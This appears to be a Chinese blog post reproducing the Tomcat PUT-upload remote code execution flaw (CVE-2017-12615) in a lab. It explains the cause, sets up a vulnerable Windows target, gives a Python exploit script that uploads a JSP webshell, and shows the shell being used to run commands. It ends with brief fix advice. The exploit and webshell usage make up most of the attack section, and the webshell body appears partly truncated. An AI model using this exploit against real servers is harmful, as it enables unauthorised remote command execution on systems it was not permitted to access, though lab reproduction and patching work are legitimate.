tomcat http status 400 – bad request_Tomcat-远程代码执行漏洞

漏洞原理

Tomcat的Servlet是在conf/web.xml配置的,通过配置文件可知,当后缀名为.jsp和.jspx的时候是通过JspServlet处理请求的,而其他的精通文件是通过DefaultServlet处理的可以得知:"1.jsp "(末尾有一个空格)并不能匹配到JspServlet,而是会交由DefaultServlet去处理当处理PUT请求时:会调用resources.bind:dirContext为FileDirContext:调用rebind创建文件又由于Windows不允许" "(空格)作为文件名结尾,所以会创建一个".jsp"文件,导致代码执行

漏洞环境

漏洞靶机 Win 2003x64 :192.168.136.136PC主机(Python环境) :192.168.1.103漏洞存在范围:Tomcat-7.0.0-Tomcat-7.0.81
4a7b044de1d6292f4e76c7ab28e8666a.png

环境搭建

win 2003x64 安装 Java环境Tomcat7.0.75下载:http://archive.apache.org/dist/tomcat/tomcat-7/v7.0.75/bin/apache-tomcat-7.0.75.exe
301bcd2cc0b9f1cbd428bfe3e8d2480c.png
56314b63ed7051cb83cb8e8529e388da.png

开启HTTP PUT

找到Tomcat的安装目录下的conf的web.xml

00210a0f23149fa58f5d44659a939f3e.png
afaf6242b8203262ad3a8f30ae4f4a6b.png
readonly            Is this context "read only", so HTTPcommands like PUT and DELETE are rejected?  [true]   这个意思就是说:当前是只读模式,是不允许修改的

找到org.apache.catalina.servlets.DefaultServlet方法:

d89b7cf6b6b508ff23d60ab1b4db2563.png

添加如下代码并保存:

readonlyfalse
02250f9d805f35d0d30702e944e13c5a.png

修改完之后,重启Tomcat:

909a2cf0a3c82a6579b1ef5dd975e89e.png

漏洞复现

Python EXP:

#! -*- coding:utf-8 -*- import httplib import sys import time body = '''"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println("Test By Power_Liu");}%>''' try: conn = httplib.HTTPConnection(sys.argv[1]) conn.request(method='OPTIONS', url='/ffffzz') headers = dict(conn.getresponse().getheaders()) if 'allow' in headers and headers['allow'].find('PUT') > 0 : conn.close() conn = httplib.HTTPConnection(sys.argv[1]) url = "/" + str(int(time.time()))+'.jsp/' #url = "/" + str(int(time.time()))+'.jsp::$DATA' conn.request( method='PUT', url= url, body=body) res = conn.getresponse() if res.status == 201 : #print 'shell:', 'http://' + sys.argv[1] + url[:-7] print 'shell:', 'http://' + sys.argv[1] + url[:-1] elif res.status == 204 : print 'file exists' else: print 'error' conn.close() else: print 'Server not vulnerable' except Exception,e: print 'Error:', e

运行Python-EXP脚本:

python2 tomcat-CVE-2017-12615.py 192.168.136.136:8080得到的shell:http://192.168.136.136:8080/1574766773.jsp
d300a0c8e245449bb7c298dfc322e058.png

得到一枚Webshell:

773266fb1241a0cf478c70184a8338e2.png
访问:http://192.168.136.136:8080/1574766773.jsp?pwd=hacker&cmd=ipconfig
c9e8f7e9f6e2f80f52d54cc9342dab4b.png

漏洞修复

将Tomcat更新到该漏洞被修复的版本(例如:Tomcat:8.5.23)readonlyinit-param不应该将false首先设置。如果该参数保留到默认(true),则攻击者无法上传文件。最后可以在前端安装WAF等防护软件来阻止PUT和DELETE请求。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值